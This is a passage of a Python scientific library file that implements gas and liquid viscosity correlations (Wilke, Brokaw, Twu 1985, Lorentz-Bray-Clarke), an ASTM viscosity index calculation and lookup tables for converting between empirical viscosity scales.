.. [1] Wilke, C. R. "A Viscosity Equation for Gas Mixtures." The Journal of
Chemical Physics 18, no. 4 (April 1, 1950): 517-19.
https://doi.org/10.1063/1.1747673.
'''
# For the cases where memory is sparse or not desired to be consumed
N = len(MWs)
# Compute the MW and assorted power vectors
MW_invs = [0.0]*N
MW_inv_mus = [0.0]*N
mu_roots = [0.0]*N
mus_inv_MW_roots = [0.0]*N
mu_root_invs_MW_25s = [0.0]*N
for i in range(N):
MW_root = sqrt(MWs[i])
MW_root_inv = 1.0/MW_root
MW_25_inv = sqrt(MW_root_inv)
mu_root_inv = 1.0/sqrt(mus[i])
x0 = mu_root_inv*MW_root
# Stored values
mu_roots[i] = 2.0*mu_root_inv*mus[i]*MW_25_inv
MW_invs[i] = 8.0*MW_root_inv*MW_root_inv
MW_inv_mus[i] = mus[i]*MW_root_inv
mus_inv_MW_roots[i] = mu_root_inv*x0
mu_root_invs_MW_25s[i] = x0*MW_25_inv
mu = 0.0
for i in range(N):
# numba's p range does help here but only when large, when small it hinders
tot = 0.0
MWi = MWs[i]
MWs_root_invi = MW_inv_mus[i]
MW_25_invi = mu_roots[i]
# Not a symmetric matrix unfortunately
for j in range(N):
# sqrt call is important for PyPy to make this fast
# Numba sees as 25% performance increase by making this an pow(x, -0.5)
phii_denom = ys[j]/sqrt(8.0 + MWi*MW_invs[j])
tot += phii_denom + phii_denom*(mus_inv_MW_roots[j]*MWs_root_invi
+ mu_root_invs_MW_25s[j]*MW_25_invi)
mu += ys[i]*mus[i]/tot
return mu
def Brokaw(T, ys, mus, MWs, molecular_diameters, Stockmayers):
r'''Calculates viscosity of a gas mixture according to
mixing rules in [1]_.
.. math::
\eta_{mix} = \sum_{i=1}^n \frac{y_i \eta_i}{\sum_{j=1}^n y_j \phi_{ij}}
.. math::
\phi_{ij} = \left( \frac{\eta_i}{\eta_j} \right)^{0.5} S_{ij} A_{ij}
.. math::
A_{ij} = m_{ij} M_{ij}^{-0.5} \left[1 +
\frac{M_{ij} - M_{ij}^{0.45}}
{2(1+M_{ij}) + \frac{(1 + M_{ij}^{0.45}) m_{ij}^{-0.5}}{1 + m_{ij}}} \right]
.. math::
m_{ij} = \left[ \frac{4}{(1+M_{ij}^{-1})(1+M_{ij})}\right]^{0.25}
.. math::
M_{ij} = \frac{M_i}{M_j}
.. math::
S_{ij} = \frac{1 + (T_i^* T_j^*)^{0.5} + (\delta_i \delta_j/4)}
{[1+T_i^* + (\delta_i^2/4)]^{0.5}[1+T_j^*+(\delta_j^2/4)]^{0.5}}
.. math::
T^* = kT/\epsilon
Parameters
----------
T : float
Temperature of fluid, [K]
ys : float
Mole fractions of gas components, [-]
mus : float
Gas viscosities of all components, [Pa*s]
MWs : float
Molecular weights of all components, [g/mol]
molecular_diameters : float
L-J molecular diameter of all components, [angstroms]
Stockmayers : float
L-J Stockmayer energy parameters of all components, []
Returns
-------
mug : float
Viscosity of gas mixture, [Pa*s]
Notes
-----
This equation is entirely dimensionless; all dimensions cancel.
The original source has not been reviewed.
This is DIPPR Procedure 8D: Method for the Viscosity of Nonhydrocarbon
Vapor Mixtures at Low Pressure (Polar and Nonpolar)
Examples
--------
>>> Brokaw(308.2, [0.05, 0.95], [1.34E-5, 9.5029E-6], [64.06, 46.07], [0.42, 0.19], [347, 432])
9.699085099801568e-06
References
----------
.. [1] Brokaw, R. S. "Predicting Transport Properties of Dilute Gases."
Industrial & Engineering Chemistry Process Design and Development
8, no. 2 (April 1, 1969): 240-53. doi:10.1021/i260030a015.
.. [2] Brokaw, R. S. Viscosity of Gas Mixtures, NASA-TN-D-4496, 1968.
.. [3] Danner, Ronald P, and Design Institute for Physical Property Data.
Manual for Predicting Chemical Process Design Data. New York, N.Y, 1982.
'''
N = len(ys)
cmps = range(len(ys))
MDs = molecular_diameters
Tsts = [T/Stockmayer_i for Stockmayer_i in Stockmayers]
Tstrs = [i**0.5 for i in Tsts]
Aij = [[0.0]*N for j in cmps]
phiij =[[0.0]*N for j in cmps]
for i in cmps:
for j in cmps:
Sij = (1.0 +Tstrs[i]*Tstrs[j] + (MDs[i]*MDs[j])/4.)/(
1.0 + Tsts[i] + (0.25*MDs[i]*MDs[i]))**0.5/(1.0 + Tsts[j]
+ (0.25*MDs[j]*MDs[j]))**0.5
if MDs[i] <= 0.1 and MDs[j] <= 0.1:
Sij = 1.0
Mij = MWs[i]/MWs[j]
Mij45 = Mij**0.45
mij = (4./((1.0 + 1.0/Mij)*(1.0 + Mij)))**0.25
Aij[i][j] = mij*Mij**-0.5*(1.0 + (Mij - Mij45)/(2.0*(1.0 + Mij)
+ (1.0 + Mij45)*mij**-0.5/(1.0 + mij)))
phiij[i][j] = (mus[i]/mus[j])**0.5*Sij*Aij[i][j]
return sum([ys[i]*mus[i]/sum([ys[j]*phiij[i][j] for j in cmps]) for i in cmps])
### Petroleum liquids
def Twu_1985_internal(T, Tb, SG):
Tb2 = Tb*Tb
Tb10 = Tb2*Tb2
Tb10 *= Tb10*Tb2 # compute Tb^-10
Tb_inv = 1.0/Tb
Tb_sqrt_inv = 1.0/sqrt(Tb)
# equation 15
Tc0 = Tb/(0.533272 + 0.191017e-3*Tb + 0.779681e-7*Tb2 - 0.284376e-10*Tb2*Tb
+ 0.959468e28/(Tb10*Tb2*Tb))
alpha = 1.0 - Tb/Tc0
alpha3 = alpha*alpha*alpha
SG0 = 0.843593 -0.128624*alpha - 3.36159*alpha3
alpha6 = alpha3*alpha3
SG0 -= 13749.5*alpha6*alpha6
dSG = SG - SG0
nu20 = (exp(4.73227 - 27.0975*alpha + alpha*(49.4491*alpha
- 50.4706*alpha3)) - 1.5)
nu10 = exp(0.801621 + 1.37179*log(nu20))
x = abs(1.99873 - 56.7394*Tb_sqrt_inv)
f1 = 1.33932*x*dSG - 21.1141*dSG*dSG*Tb_sqrt_inv
f2 = x*dSG - 21.1141*dSG*dSG*Tb_sqrt_inv
square_term2 = (1.0 + f2 + f2)/(1.0 - f2 - f2)
square_term2 *= square_term2
square_term1 = (1.0 + f1 + f1)/(1.0 - f1 - f1)
square_term1 *= square_term1
x0 = 450.0*Tb_inv
nu1 = exp(log(nu10 + x0)*square_term1) - x0
nu2 = exp(log(nu20 + x0)*square_term2) - x0
# T1 = 559.67 # 100 deg F
# T2 = 669.67 # 210 deg F
logT1 = 6.3273473243178415 # log(559.67)
# logT2 = 6.506785053735233 # log(669.67)
Z1 = nu1 + 0.7 + exp(-1.47 - nu1*(1.84 + 0.51*nu1))
Z2 = nu2 + 0.7 + exp(-1.47 - nu2*(1.84 + 0.51*nu2))
loglogZ1 = log(log(Z1))
try:
B = (loglogZ1 - log(log(Z2)))*-5.572963964974682 #/(logT1 - logT2)
except:
B = 0.0
try:
Z = exp(exp(loglogZ1 + B*(log(T) - logT1)))
except:
Z = 1.0
# cSt
x0 = Z - 0.7
nu = x0 - exp(-0.7487 + x0*(x0*(0.6119 - 0.3193*x0) - 3.295))
return nu
def Twu_1985(T, Tb, rho):
r'''Calculate the viscosity of a petroleum liquid using the
Twu (1985) correlation
developed in [1]_. Based on a fit to n-alkanes that used as a
reference. Requires the boiling point and density of
the system.
Parameters
----------
T : float
Temperature of fluid [K]
Tb : float
Normal boiling point, [K]
rho : float
Liquid density liquid as measured at 60 deg F, [kg/m^3]
Returns
-------
mu : float
Liquid viscosity, [Pa*s]
Notes
-----
The formulas are as follows:
.. math::
T_{c}^{\circ}=T_{b}\left(0.533272+0.191017 \times 10^{-3} T_{b}
+0.779681 \times 10^{-7} T_{b}^{2}
-0.284376 \times 10^{-10} T_{b}^{3}+0.959468
\times 10^{28}/T_{b}^{13}\right)^{-1}
.. math::
\alpha=1-T_{b} / T_{c}^{\circ}
.. math::
\ln \left(\nu_2^{\circ}+1.5\right)=4.73227-27.0975 \alpha
+49.4491 \alpha^{2}-50.4706 \alpha^{4}
.. math::
\ln \left(\nu_1^{\circ}\right)=0.801621+1.37179 \ln \left(\nu_2^{\circ}\right)
.. math::
{SG}^{\circ}=0.843593-0.128624 \alpha-3.36159 \alpha^{3}-13749.5 \alpha^{12}
.. math::
\Delta {SG} = {SG} - {SG}^\circ
.. math::
|x|=\left|1.99873-56.7394 / \sqrt{T_{b}}\right|
.. math::
f_{1}=1.33932|x| \Delta {SG} - 21.1141 \Delta {SG}^{2} / \sqrt{T_{b}}
.. math::
f_{2}=|x| \Delta {SG}-21.1141 \Delta {SG}^{2} / \sqrt{T_{b}}
.. math::
\ln \left(\nu_{1}+\frac{450}{T_{b}}\right)=\ln \left(\nu_{1}^{\circ}
+\frac{450}{T_{b}}\right)\left(\frac{1+2 f_{1}}{1-2 f_{1}}\right)^{2}
.. math::
\ln \left(\nu_{2}+\frac{450}{T_{b}}\right)=\ln \left(\nu_{2}^{\circ}
+\frac{450}{T_{b}}\right)\left(\frac{1+2 f_{2}}{1-2 f_{2}}\right)^{2}
.. math::
Z = \nu+0.7+\exp \left(-1.47-1.84 \nu-0.51 \nu^{2}\right)
.. math::
B=\frac{\ln \ln Z_{1}-\ln \ln Z_{2}}{\ln T_1-\ln T_2}
.. math::
\ln \ln Z=\ln \ln Z_{1}+B(\ln T-\ln T_1)
.. math::
\nu=(Z-0.7)-\exp \left(-0.7487-3.295Z-0.7)+0.6119Z-0.7)^{2}-0.3193Z-0.7)^{3}\right)
Examples
--------
Sample point from article:
>>> Twu_1985(T=338.7055, Tb=672.3166, rho=895.5189)
0.008235009644854494
References
----------
.. [1] Twu, Chorng H. "Internally Consistent Correlation for Predicting
Liquid Viscosities of Petroleum Fractions." Industrial & Engineering
Chemistry Process Design and Development 24, no. 4 (October 1, 1985):
1287-93. https://doi.org/10.1021/i200031a064.
'''
SG = rho*0.00100098388466972 #1/999.0170824078306
nu = Twu_1985_internal(T*1.8, Tb*1.8, SG)
nu = nu*1e-6 # to m^2/s
rho = SG*999.0170824078306 # calculate density from SG
mu = nu*rho
return mu
### Viscosity for Liquids or Gases
def Lorentz_Bray_Clarke(T, P, Vm, zs, MWs, Tcs, Pcs, Vcs):
r'''Calculates the viscosity of a gas or a liquid using the method of
Lorentz, Bray, and Clarke [1]_. This method is not quite the same as the
original, but rather the form commonly presented and used today. The
original had a different formula for pressure correction for gases which
was tabular and not presented entirely in [1]_. However using that
distinction introduces a discontinuity between the liquid and gas viscosity,
so it is not normally used.
.. math::
\mu [\text{centipoise}] = \mu_{\text{P low, Stiel-hThodos}} [\text{centipoise}]
+ \frac{\text{poly}^4 - 0.0001}{\xi}
.. math::
\text{poly} = (0.1023 + 0.023364 \rho_r + 0.058533\rho_r^2
- 0.040758\rho_r^3 + 0.0093724\rho_r^4)
.. math::
\xi = T_c^{1/6} MW^{-1/2} (P_c\text{[atm]})^{-2/3}
Parameters
----------
T : float
Temperature of the fluid [K]
P : float
Pressure of the fluid [Pa]
Vm : float
Molar volume of the fluid at the actual conditions, [m^3/mol]
zs : list[float]
Mole fractions of chemicals in the fluid, [-]
MWs : list[float]
Molwcular weights of chemicals in the fluid [g/mol]
Tcs : float
Critical temperatures of chemicals in the fluid [K]
Pcs : float
Critical pressures of chemicals in the fluid [Pa]
Vcs : float
Critical molar volumes of chemicals in the fluid; these are often used
as tuning parameters, fit to match a pure component experimental
viscosity value [m^3/mol]
Returns
-------
mu : float
Viscosity of phase at actual conditions , [Pa*s]
Notes
-----
An example from [2]_ was implemented and checked for validation. Somewhat
different rounding is used in [2]_.
The mixing of the pure component Stiel-Thodos viscosities happens with the
Herning-Zipperer mixing rule:
.. math::
\mu = \frac{\sum x_i \mu_i \sqrt{MW_i}}{\sum x_i \sqrt{MW_i}}
Examples
--------
>>> Lorentz_Bray_Clarke(T=300.0, P=1e6, Vm=0.0023025, zs=[.4, .3, .3],
... MWs=[16.04246, 30.06904, 44.09562], Tcs=[190.564, 305.32, 369.83],
... Pcs=[4599000.0, 4872000.0, 4248000.0], Vcs=[9.86e-05, 0.0001455, 0.0002])
9.925488160761484e-06
References
----------
.. [1] Lohrenz, John, Bruce G. Bray, and Charles R. Clark. "Calculating
Viscosities of Reservoir Fluids From Their Compositions." Journal of
Petroleum Technology 16, no. 10 (October 1, 1964): 1,171-1,176.
https://doi.org/10.2118/915-PA.
.. [2] Whitson, Curtis H., and Michael R. Brulé. Phase Behavior. Henry L.
Doherty Memorial Fund of AIME, Society of Petroleum Engineers, 2000.
'''
Tc, Pc, Vc, MW = 0.0, 0.0, 0.0, 0.0
N = len(zs)
for i in range(N):
Tc += Tcs[i]*zs[i]
Pc += Pcs[i]*zs[i]
Vc += Vcs[i]*zs[i]
MW += MWs[i]*zs[i]
Pc = Pc/101325. # The `xi` parameter is defined using P in atmospheres
xi = Tc**(1.0/6.0)*MW**-0.5*Pc**(-2.0/3.0)
rhoc = 1.0/Vc # Molar pseudocritical density
rhom = 1.0/Vm
rhor = rhom/rhoc
# mu star is computed here
mus_low_gas = [0.0]*N
for i in range(N):
mus_low_gas[i] = Stiel_Thodos(T, Tcs[i], Pcs[i], MWs[i])
mu_low_gas = Herning_Zipperer(zs, mus_low_gas, MWs)
# Polynomial - in horner form, validated
poly = rhor*(rhor*(rhor*(0.0093724*rhor - 0.040758) + 0.058533) + 0.023364) + 0.1023
mu_low_gas *= 1e3 # Convert low-pressure viscosity to cP
poly2 = poly*poly
mu = (mu_low_gas*xi + poly2*poly2 - 0.0001)/xi
return mu*1e-3 # Convert back from cP to Pa
### Misc functions
def _round_whole_even(i):
r'''Round a number to the nearest whole number. If the number is exactly
between two numbers, round to the even whole number. Used by
`viscosity_index`.
Parameters
----------
i : float
Number, [-]
Returns
-------
i : int
Rounded number, [-]
Notes
-----
Should never run with inputs from a practical function, as numbers on
computers aren't really normally exactly between two numbers.
Examples
--------
_round_whole_even(116.5)
116
'''
if i % .5 == 0.0:
if (i + 0.5) % 2 == 0.0:
i = i + 0.5
else:
i = i - 0.5
else:
i = round(i, 0)
return int(i)
VI_nus = [2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7, 2.8, 2.9, 3.0, 3.1, 3.2, 3.3,
3.4, 3.5, 3.6, 3.7, 3.8, 3.9, 4.0, 4.1, 4.2, 4.3, 4.4, 4.5, 4.6, 4.7,
4.8, 4.9, 5.0, 5.1, 5.2, 5.3, 5.4, 5.5, 5.6, 5.7, 5.8, 5.9, 6.0, 6.1,
6.2, 6.3, 6.4, 6.5, 6.6, 6.7, 6.8, 6.9, 7.0, 7.1, 7.2, 7.3, 7.4, 7.5,
7.6, 7.7, 7.8, 7.9, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5, 8.6, 8.7, 8.8, 8.9,
9.0, 9.1, 9.2, 9.3, 9.4, 9.5, 9.6, 9.7, 9.8, 9.9, 10.0, 10.1, 10.2,
10.3, 10.4, 10.5, 10.6, 10.7, 10.8, 10.9, 11.0, 11.1, 11.2, 11.3, 11.4,
11.5, 11.6, 11.7, 11.8, 11.9, 12.0, 12.1, 12.2, 12.3, 12.4, 12.5, 12.6,
12.7, 12.8, 12.9, 13.0, 13.1, 13.2, 13.3, 13.4, 13.5, 13.6, 13.7, 13.8,
13.9, 14.0, 14.1, 14.2, 14.3, 14.4, 14.5, 14.6, 14.7, 14.8, 14.9, 15.0,
15.1, 15.2, 15.3, 15.4, 15.5, 15.6, 15.7, 15.8, 15.9, 16.0, 16.1, 16.2,
16.3, 16.4, 16.5, 16.6, 16.7, 16.8, 16.9, 17.0, 17.1, 17.2, 17.3, 17.4,
17.5, 17.6, 17.7, 17.8, 17.9, 18.0, 18.1, 18.2, 18.3, 18.4, 18.5, 18.6,
18.7, 18.8, 18.9, 19.0, 19.1, 19.2, 19.3, 19.4, 19.5, 19.6, 19.7, 19.8,
19.9, 20.0, 20.2, 20.4, 20.6, 20.8, 21.0, 21.2, 21.4, 21.6, 21.8, 22.0,
22.2, 22.4, 22.6, 22.8, 23.0, 23.2, 23.4, 23.6, 23.8, 24.0, 24.2, 24.4,
24.6, 24.8, 25.0, 25.2, 25.4, 25.6, 25.8, 26.0, 26.2, 26.4, 26.6, 26.8,
27.0, 27.2, 27.4, 27.6, 27.8, 28.0, 28.2, 28.4, 28.6, 28.8, 29.0, 29.2,
29.4, 29.6, 29.8, 30.0, 30.5, 31.0, 31.5, 32.0, 32.5, 33.0, 33.5, 34.0,
34.5, 35.0, 35.5, 36.0, 36.5, 37.0, 37.5, 38.0, 38.5, 39.0, 39.5, 40.0,
40.5, 41.0, 41.5, 42.0, 42.5, 43.0, 43.5, 44.0, 44.5, 45.0, 45.5, 46.0,
46.5, 47.0, 47.5, 48.0, 48.5, 49.0, 49.5, 50.0, 50.5, 51.0, 51.5, 52.0,
52.5, 53.0, 53.5, 54.0, 54.5, 55.0, 55.5, 56.0, 56.5, 57.0, 57.5, 58.0,
58.5, 59.0, 59.5, 60.0, 60.5, 61.0, 61.5, 62.0, 62.5, 63.0, 63.5, 64.0,
64.5, 65.0, 65.5, 66.0, 66.5, 67.0, 67.5, 68.0, 68.5, 69.0, 69.5, 70.0
]
VI_Ls = [7.994, 8.64, 9.309, 10.0, 10.71, 11.45, 12.21, 13.0, 13.8, 14.63,
15.49, 16.36, 17.26, 18.18, 19.12, 20.09, 21.08, 22.09, 23.13, 24.19,
25.32, 26.5, 27.75, 29.07, 30.48, 31.96, 33.52, 35.13, 36.79, 38.5,
40.23, 41.99, 43.76, 45.53, 47.31, 49.09, 50.87, 52.64, 54.42, 56.2,
57.97, 59.74, 61.52, 63.32, 65.18, 67.12, 69.16, 71.29, 73.48, 75.72,
78.0, 80.25, 82.39, 84.53, 86.66, 88.85, 91.04, 93.2, 95.43, 97.72,
100.0, 102.3, 104.6, 106.9, 109.2, 111.5, 113.9, 116.2, 118.5, 120.9,
123.3, 125.7, 128.0, 130.4, 132.8, 135.3, 137.7, 140.1, 142.7, 145.2,
147.7, 150.3, 152.9, 155.4, 158.0, 160.6, 163.2, 165.8, 168.5, 171.2,
173.9, 176.6, 179.4, 182.1, 184.9, 187.6, 190.4, 193.3, 196.2, 199.0,
201.9, 204.8, 207.8, 210.7, 213.6, 216.6, 219.6, 222.6, 225.7, 228.8,
231.9, 235.0, 238.1, 241.2, 244.3, 247.4, 250.6, 253.8, 257.0, 260.1,
263.3, 266.6, 269.8, 273.0, 276.3, 279.6, 283.0, 286.4, 289.7, 293.0,
296.5, 300.0, 303.4, 306.9, 310.3, 313.9, 317.5, 321.1, 324.6, 328.3,
331.9, 335.5, 339.2, 342.9, 346.6, 350.3, 354.1, 358.0, 361.7, 365.6,
369.4, 373.3, 377.1, 381.0, 384.9, 388.9, 392.7, 396.7, 400.7, 404.6,
408.6, 412.6, 416.7, 420.7, 424.9, 429.0, 433.2, 437.3, 441.5, 445.7,
449.9, 454.2, 458.4, 462.7, 467.0, 471.3, 475.7, 479.7, 483.9, 488.6,
493.2, 501.5, 510.8, 519.9, 528.8, 538.4, 547.5, 556.7, 566.4, 575.6,
585.2, 595.0, 604.3, 614.2, 624.1, 633.6, 643.4, 653.8, 663.3, 673.7,
683.9, 694.5, 704.2, 714.9, 725.7, 736.5, 747.2, 758.2, 769.3, 779.7,
790.4, 801.6, 812.8, 824.1, 835.5, 847.0, 857.5, 869.0, 880.6, 892.3,
904.1, 915.8, 927.6, 938.6, 951.2, 963.4, 975.4, 987.1, 998.9, 1011.0,
1023.0, 1055.0, 1086.0, 1119.0, 1151.0, 1184.0, 1217.0, 1251.0, 1286.0,
1321.0, 1356.0, 1391.0, 1427.0, 1464.0, 1501.0, 1538.0, 1575.0, 1613.0,
1651.0, 1691.0, 1730.0, 1770.0, 1810.0, 1851.0, 1892.0, 1935.0, 1978.0,
2021.0, 2064.0, 2108.0, 2152.0, 2197.0, 2243.0, 2288.0, 2333.0, 2380.0,
2426.0, 2473.0, 2521.0, 2570.0, 2618.0, 2667.0, 2717.0, 2767.0, 2817.0,
2867.0, 2918.0, 2969.0, 3020.0, 3073.0, 3126.0, 3180.0, 3233.0, 3286.0,
3340.0, 3396.0, 3452.0, 3507.0, 3563.0, 3619.0, 3676.0, 3734.0, 3792.0,
3850.0, 3908.0, 3966.0, 4026.0, 4087.0, 4147.0, 4207.0, 4268.0, 4329.0,
4392.0, 4455.0, 4517.0, 4580.0, 4645.0, 4709.0, 4773.0, 4839.0, 4905.0
]
VI_Hs = [6.394, 6.894, 7.41, 7.944, 8.496, 9.063, 9.647, 10.25, 10.87, 11.5,
12.15, 12.82, 13.51, 14.21, 14.93, 15.66, 16.42, 17.19, 17.97, 18.77,
19.56, 20.37, 21.21, 22.05, 22.92, 23.81, 24.71, 25.63, 26.57, 27.53,
28.49, 29.46, 30.43, 31.4, 32.37, 33.34, 34.32, 35.29, 36.26, 37.23,
38.19, 39.17, 40.15, 41.13, 42.14, 43.18, 44.24, 45.33, 46.44, 47.51,
48.57, 49.61, 50.69, 51.78, 52.88, 53.98, 55.09, 56.2, 57.31, 58.45,
59.6, 60.74, 61.89, 63.05, 64.18, 65.32, 66.48, 67.64, 68.79, 69.94,
71.1, 72.27, 73.42, 74.57, 75.73, 76.91, 78.08, 79.27, 80.46, 81.67,
82.87, 84.08, 85.3, 86.51, 87.72, 88.95, 90.19, 91.4, 92.65, 93.92,
95.19, 96.45, 97.71, 98.97, 100.2, 101.5, 102.8, 104.1, 105.4, 106.7,
108.0, 109.4, 110.7, 112.0, 113.3, 114.7, 116.0, 117.4, 118.7, 120.1,
121.5, 122.9, 124.2, 125.6, 127.0, 128.4, 129.8, 131.2, 132.6, 134.0,
135.4, 136.8, 138.2, 139.6, 141.0, 142.4, 143.9, 145.3, 146.8, 148.2,
149.7, 151.2, 152.6, 154.1, 155.6, 157.0, 158.6, 160.1, 161.6, 163.1,
164.6, 166.1, 167.7, 169.2, 170.7, 172.3, 173.8, 175.4, 177.0, 178.6,
180.2, 181.7, 183.3, 184.9, 186.5, 188.1, 189.7, 191.3, 192.9, 194.6,
196.2, 197.8, 199.4, 201.0, 202.6, 204.3, 205.9, 207.6, 209.3, 211.0,
212.7, 214.4, 216.1, 217.7, 219.4, 221.1, 222.8, 224.5, 226.2, 227.7,
229.5, 233.0, 236.4, 240.1, 243.5, 247.1, 250.7, 254.2, 257.8, 261.5,
264.9, 268.6, 272.3, 275.8, 279.6, 283.3, 286.8, 290.5, 294.4, 297.9,
301.8, 305.6, 309.4, 313.0, 317.0, 320.9, 324.9, 328.8, 332.7, 336.7,
340.5, 344.4, 348.4, 352.3, 356.4, 360.5, 364.6, 368.3, 372.3, 376.4,
380.6, 384.6, 388.8, 393.0, 396.6, 401.1, 405.3, 409.5, 413.5, 417.6,
421.7, 432.4, 443.2, 454.0, 464.9, 475.9, 487.0, 498.1, 509.6, 521.1,
532.5, 544.0, 555.6, 567.1, 579.3, 591.3, 603.1, 615.0, 627.1, 639.2,
651.8, 664.2, 676.6, 689.1, 701.9, 714.9, 728.2, 741.3, 754.4, 767.6,
780.9, 794.5, 808.2, 821.9, 835.5, 849.2, 863.0, 876.9, 890.9, 905.3,
919.6, 933.6, 948.2, 962.9, 977.5, 992.1, 1007.0, 1021.0, 1036.0,
1051.0, 1066.0, 1082.0, 1097.0, 1112.0, 1127.0, 1143.0, 1159.0, 1175.0,
1190.0, 1206.0, 1222.0, 1238.0, 1254.0, 1270.0, 1286.0, 1303.0, 1319.0,
1336.0, 1352.0, 1369.0, 1386.0, 1402.0, 1419.0, 1436.0, 1454.0, 1471.0,
1488.0, 1506.0, 1523.0, 1541.0, 1558.0
]
def viscosity_index(nu_40, nu_100, rounding=False):
r'''Calculates the viscosity index of a liquid. Requires dynamic viscosity
of a liquid at 40°C and 100°C. Value may either be returned with or
without rounding. Rounding is performed per the standard.
if nu_100 < 70:
.. math::
L, H = \text{interp}(nu_100)
else:
.. math::
L = 0.8353\nu_{100}^2 + 14.67\nu_{100} - 216
.. math::
H = 0.1684\nu_{100}^2 + 11.85\nu_{100} - 97
if nu_40 > H:
.. math::
VI = \frac{L-nu_{40}}{L-H}\cdot 100
else:
.. math::
N = \frac{\ln(H) - \ln(\nu_{40})}{\ln (\nu_{100})}
.. math::
VI = \frac{10^N-1}{0.00715} + 100
Parameters
----------
nu_40 : float
Dynamic viscosity of fluid at 40°C, [m^2/s]
nu_100 : float
Dynamic viscosity of fluid at 100°C, [m^2/s]
rounding : bool, optional
Whether to round the value or not.
Returns
-------
VI: float
Viscosity index [-]
Notes
-----
VI is undefined for nu_100 under 2 mm^2/s. None is returned if this is the
case. Internal units are mm^2/s. Higher values of viscosity index suggest
a lesser decrease in kinematic viscosity as temperature increases.
Note that viscosity is a pressure-dependent property, and that the
viscosity index is defined for a fluid at whatever pressure it is at.
The viscosity index is thus also a function of pressure.
Examples
--------
>>> viscosity_index(73.3E-6, 8.86E-6, rounding=True)
92
References
----------
.. [1] ASTM D2270-10(2016) Standard Practice for Calculating Viscosity
Index from Kinematic Viscosity at 40 °C and 100 °C, ASTM International,
West Conshohocken, PA, 2016, http://dx.doi.org/10.1520/D2270-10R16
'''
nu_40, nu_100 = nu_40*1E6, nu_100*1E6 # m^2/s to mm^2/s
if nu_100 < 2.0:
return None # Not defined for under this
elif nu_100 < 70.0:
L = interp(nu_100, VI_nus, VI_Ls)
H = interp(nu_100, VI_nus, VI_Hs)
else:
L = (0.8353*nu_100 + 14.67)*nu_100 - 216.0
H = (0.1684*nu_100 + 11.85)*nu_100 - 97.0
if nu_40 > H:
VI = (L-nu_40)/(L-H)*100.0
else:
N = (log(H/nu_40))/log(nu_100)
VI = (10**N - 1.0)*(1.0/0.00715) + 100.0
if rounding:
VI = _round_whole_even(VI)
return VI
# All results in units of seconds, except engler and barbey which are degrees
# Data from Hydraulic Institute Handbook
viscosity_scales = {}
SSU_SSU = [31.0, 35.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0, 150.0, 200.0, 250.0, 300.0, 400.0, 500.0, 600.0, 700.0, 800.0, 900.0, 1000.0, 1500.0, 2000.0, 2500.0, 3000.0, 4000.0, 5000.0, 6000.0, 7000.0, 8000.0, 9000.0, 10000.0, 15000.0, 20000.0]
SSU_nu = [1.0, 2.56, 4.3, 7.4, 10.3, 13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['saybolt universal'] = (SSU_SSU, SSU_nu)
SSF_SSF = [12.95, 13.7, 14.44, 15.24, 19.3, 23.5, 28.0, 32.5, 41.9, 51.6, 61.4, 71.1, 81.0, 91.0, 100.7, 150.0, 200.0, 250.0, 300.0, 400.0, 500.0, 600.0, 700.0, 800.0, 900.0, 1000.0, 1500.0, 2000.0]
SSF_nu = [13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0, 3300.0, 4400.0]
viscosity_scales['saybolt furol'] = (SSF_SSF, SSF_nu)
SRS_SRS = [29.0, 32.1, 36.2, 44.3, 52.3, 60.9, 69.2, 77.6, 85.6, 128.0, 170.0, 212.0, 254.0, 338.0, 423.0, 508.0, 592.0, 677.0, 762.0, 896.0, 1270.0, 1690.0, 2120.0, 2540.0, 3380.0, 4230.0, 5080.0, 5920.0, 6770.0, 7620.0, 8460.0, 13700.0, 18400.0]
SRS_nu = SSU_nu
viscosity_scales['redwood standard'] = (SRS_SRS, SRS_nu)
SRA_SRA = [5.1, 5.83, 6.77, 7.6, 8.44, 9.3, 10.12, 14.48, 18.9, 23.45, 28.0, 37.1, 46.2, 55.4, 64.6, 73.8, 83.0, 92.1, 138.2, 184.2, 230.0, 276.0, 368.0, 461.0, 553.0, 645.0, 737.0, 829.0, 921.0]
SRA_nu = [4.3, 7.4, 10.3, 13.1, 15.7, 18.2, 20.6, 32.1, 43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0, 330.0, 440.0, 550.0, 660.0, 880.0, 1100.0, 1320.0, 1540.0, 1760.0, 1980.0, 2200.0]
viscosity_scales['redwood admiralty'] = (SRA_SRA, SRA_nu)
Engler_degrees = [1.0, 1.16, 1.31, 1.58, 1.88, 2.17, 2.45, 2.73, 3.02, 4.48, 5.92, 7.35, 8.79, 11.7, 14.6, 17.5, 20.45, 23.35, 26.3, 29.2, 43.8, 58.4, 73.0, 87.6, 117.0, 146.0, 175.0, 204.5, 233.5, 263.0, 292.0, 438.0, 584.0]
Engler_nu = SSU_nu
viscosity_scales['engler'] = (Engler_degrees, Engler_nu)
# Note: Barbey is decreasing not increasing
Barbey_degrees = [6200.0, 2420.0, 1440.0, 838.0, 618.0, 483.0, 404.0, 348.0, 307.0, 195.0, 144.0, 114.0, 95.0, 70.8, 56.4, 47.0, 40.3, 35.2, 31.3, 28.2, 18.7, 14.1, 11.3, 9.4, 7.05, 5.64, 4.7, 4.03, 3.52, 3.13, 2.82, 2.5, 1.4]
Barbey_nu = SSU_nu
viscosity_scales['barbey'] = (Barbey_degrees, Barbey_nu)
#
PC7_PC7 = [40.0, 46.0, 52.5, 66.0, 79.0, 92.0, 106.0, 120.0, 135.0, 149.0]
PC7_nu = [43.2, 54.0, 65.0, 87.6, 110.0, 132.0, 154.0, 176.0, 198.0, 220.0]
viscosity_scales['parlin cup #7'] = (PC7_PC7, PC7_nu)
PC10_PC10 = [15.0, 21.0, 25.0, 30.0, 35.0, 39.0, 41.0, 43.0, 65.0, 86.0, 108.0, 129.0, 172.0, 215.0, 258.0, 300.0, 344.0, 387.0, 430.0, 650.0, 860.0]
